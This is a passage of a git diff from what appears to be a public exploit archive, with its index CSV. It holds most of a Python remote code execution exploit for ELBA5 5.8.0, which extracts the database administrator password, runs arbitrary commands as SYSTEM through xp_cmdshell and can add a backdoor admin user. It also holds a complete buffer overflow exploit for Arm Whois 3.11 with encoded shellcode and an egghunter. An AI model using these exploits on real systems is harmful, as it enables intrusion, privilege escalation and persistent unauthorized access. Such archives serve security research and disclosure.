Exploit") + print("") + print("This exploit has been tested against version 5.7.1") + print("to 5.8.0. It can be used to remotely obtain code") + print("execution on the ELBA5 server with full SYSTEM") + print("level permissions.") + print("") + print("Discovered by: Florian Bogner @ Bee IT Security") + print(" florian(at)bee-itsecurity.at") + print("==================================================") + print("") + + if (len(sys.argv)<3): + print_usage() + sys.exit(1) + + # get info from cli + global DB_HOST + global ACTION + + DB_HOST=sys.argv[1] + ACTION=sys.argv[2] + + #### phase 1 + print("[*] Starting phase 1: Obtain & Decrypt DBA password") + DB_DBA_PWD=fetch_db_dba_pwd() + + if (DB_DBA_PWD==None): + print("[-] Something went wrong in phase 1... Exiting") + sys.exit(1) + + print("[+] Received the DBA password: "+DB_DBA_PWD) + + #### phase 2 + print("[*] Starting phase 2: Establishing a DB connection as DBA") + conn = sqlanydb.connect( + uid=DB_DBA_UID, + pwd=DB_DBA_PWD, + servername='ELBA5SRV', + host=''+DB_HOST+':'+DB_PORT + ) + + if (conn==None): + print("[-] Something went wrong in phase 2... Exiting") + sys.exit(1) + + print("[+] Connection established as DBA") + + #### deliver payload + if (ACTION=="addUser"): + print("[*] Starting phase 3: Adding a backdoor user") + add_elba_user(conn); + elif (ACTION=="runCommand"): + print("[*] Starting phase 3: Running command") + run_command(conn); + else: + print("[*] Unknown action "+ACTION+"... Exiting cleanly") + + #### winding down + print("[*] Closing DBA connection") + conn.close() + +def print_usage(): + print("Usage: "+sys.argv[0]+" "); + print(""); + print("target: The system to attack"); + print("actions:"); + print(" * addUser: adds an ELBA Backdoor user to the given install") + print(" * runCommand: A command to run on the target as SYSTEM") + print(" Provide the command to run as a sub argument") + print(" (No output is provided)") + +def run_command(conn): + + if (len(sys.argv)!=4): + print("[-] No command given... Exiting cleanly") + return + + CMD=sys.argv[3] + + curs = conn.cursor() + + print("[*] Will try to execute: "+CMD) + curs.execute("CALL xp_cmdshell('"+CMD+"');") + + curs.close() + +def add_elba_user(conn): + USER_TO_ADD = "HACKER" + USER_PASSWORD = "H4cker" + + # check if a user with the given name already exists + print("[*] Checking if the username "+USER_TO_ADD+" is unused") + + curs = conn.cursor() + curs.execute("SELECT * FROM \"elbndba\".\"BEDIENER\" WHERE BEDIENER='"+USER_TO_ADD+"'") + rowset = curs.fetchall() + curs.close() + + if (len(rowset)>0): + print("[-] A user with the name "+USER_TO_ADD+" already exists! Exiting cleanly...") + return + + + + # get the largest current bedienerKey + print("[*] Request the largest current bedienerKey") + curs = conn.cursor() + curs.execute("SELECT MAX(bedienerKey) FROM \"elbndba\".\"BEDIENER\"") + currentBedienerKey = curs.fetchone()[0] + curs.close() + + newBedienerKey=currentBedienerKey+1 + + print("[*] Will use the new bedienerKey "+str(newBedienerKey)) + + + # create password hash + print("[*] Hash the password") + usrdir="USER"+str(newBedienerKey) + string_to_hash=USER_PASSWORD+str(newBedienerKey)+usrdir + + hash = hashlib.sha256(string_to_hash.encode('ascii','replace')).hexdigest() + print("[*] Will use the hash: "+hash) + + # add the user + print("[*] Finally adding the user") + curs = conn.cursor() + + sql = "INSERT INTO \"elbndba\".\"BEDIENER\" (BEDIENER,NAME,ABTEILUNG,PASSWORT,GESPERRT,ADMIN,USRDIR,geloescht,bedienerKey) " + sql += "VALUES ('"+USER_TO_ADD+"','"+USER_TO_ADD+"','','"+hash+"',0,1,'"+usrdir+"',0,"+str(newBedienerKey)+");" + + curs.execute(sql) + + # commit changes + print("[*] Commiting changes") + conn.commit() + + print("[+] Login as "+USER_TO_ADD+" with the password "+USER_PASSWORD) + curs.close() + +# connect to the target host with the "connector" user and extract the dba password +def fetch_db_dba_pwd(): + + target_host=''+DB_HOST+':'+DB_PORT + print("[*] Trying to connect to the target server: "+target_host) + + conn = sqlanydb.connect( + uid=DB_CONNECTOR_UID, + pwd=DB_CONNECTOR_PWD, + servername='ELBA5SRV', + host=target_host + ) + + print("[*] Extracting the secret key") + curs = conn.cursor() + curs.execute("SELECT DECRYPT(daten, '"+DB_DBA_ENCRYPTION_PWD+"', 'AES') FROM elbndba.connection") + + # decode the result to a valid utf-8 string + decrypted_pwd=curs.fetchone()[0].decode("utf-8") ; + + curs.close() + conn.close() + + return decrypted_pwd; + +main(); \ No newline at end of file diff --git a/exploits/windows_x86/local/45907.txt b/exploits/windows_x86/local/45907.txt new file mode 100644 index 000000000..7310278cd --- /dev/null +++ b/exploits/windows_x86/local/45907.txt @@ -0,0 +1,42 @@ +# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR) +# Google Dork: [if applicable] +# Date: 23/11/2018 +# Exploit Author: zephyr +# Vendor Homepage: http://www.armcode.com +# Software Link: http://www.armcode.com/downloads/arm-whois.exe +# Version: 3.11 +# Tested on: Windows Vista Ultimate SP1 x86 unpatched +# CVE : + +# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched +# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows +nops = "\x90"*20 +buf = "w00tw00t" + nops + ("\xba\x0e\xc3\xc8\xe6\xdd\xc4\xd9\x74\x24\xf4\x5e\x29" +"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x01\x21" +"\x3d\x1a\xf5\x27\xbe\xe3\x05\x48\x36\x06\x34\x48\x2c" +"\x42\x66\x78\x26\x06\x8a\xf3\x6a\xb3\x19\x71\xa3\xb4" +"\xaa\x3c\x95\xfb\x2b\x6c\xe5\x9a\xaf\x6f\x3a\x7d\x8e" +"\xbf\x4f\x7c\xd7\xa2\xa2\x2c\x80\xa9\x11\xc1\xa5\xe4" +"\xa9\x6a\xf5\xe9\xa9\x8f\x4d\x0b\x9b\x01\xc6\x52\x3b" +"\xa3\x0b\xef\x72\xbb\x48\xca\xcd\x30\xba\xa0\xcf\x90" +"\xf3\x49\x63\xdd\x3c\xb8\x7d\x19\xfa\x23\x08\x53\xf9" +"\xde\x0b\xa0\x80\x04\x99\x33\x22\xce\x39\x98\xd3\x03" +"\xdf\x6b\xdf\xe8\xab\x34\xc3\xef\x78\x4f\xff\x64\x7f" +"\x80\x76\x3e\xa4\x04\xd3\xe4\xc5\x1d\xb9\x4b\xf9\x7e" +"\x62\x33\x5f\xf4\x8e\x20\xd2\x57\xc4\xb7\x60\xe2\xaa" +"\xb8\x7a\xed\x9a\xd0\x4b\x66\x75\xa6\x53\xad\x32\x02" +"\x6e\xac\x19\x3b\xd7\xa4\x1c\x26\xe8\x12\x62\x5f\x6b" +"\x97\x1a\xa4\x73\xd2\x1f\xe0\x33\x0e\x6d\x79\xd6\x30" +"\xc2\x7a\xf3\x52\x85\xe8\x9f\xba\x20\x89\x3a\xc3") + +egghunter = nops + ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + "\x90"*15 +junk = "A"*(672-len(buf+egghunter)) +nseh = "\xeb\xc7\x90\x90" +seh = "\x57\x22\x41" + +payload = junk + buf + egghunter + nseh + seh + +f = open("tmp.txt", 'wb') +f.write(payload) +f.close() +print len(payload) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a1d4d608a..4b2022f2b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6195,6 +6195,7 @@ id,file,description,date,author,type,platform,port 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows, 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows, 45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos, +45901,exploits/linux/dos/45901.txt,"MariaDB Client 10.1.26 - Denial of Service (PoC)",2018-11-26,strider,dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10116,6 +10117,8 @@ id,file,description,date,author,type,platform,port 45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86, 45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple, 45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows, +45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86, +45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16965,6 +16968,8 @@ id,file,description,date,author,type,platform,port 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php, 45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79 45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990 +45905,exploits/windows/remote/45905.py,"ELBA5 5.8.0 - Remote Code Execution",2018-11-26,"Florian Bogner",remote,windows,2640 +45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40400,3 +40405,8 @@ id,file,description,date,author,type,platform,port 45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80 45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80 45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80 +45899,exploits/hardware/webapps/45899.txt,"Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials",2018-11-26,Hodorsec,webapps,hardware, +45900,exploits/php/webapps/45900.txt,"WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting",2018-11-26,En_dust,webapps,php,80 +45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80 +45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80 +45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80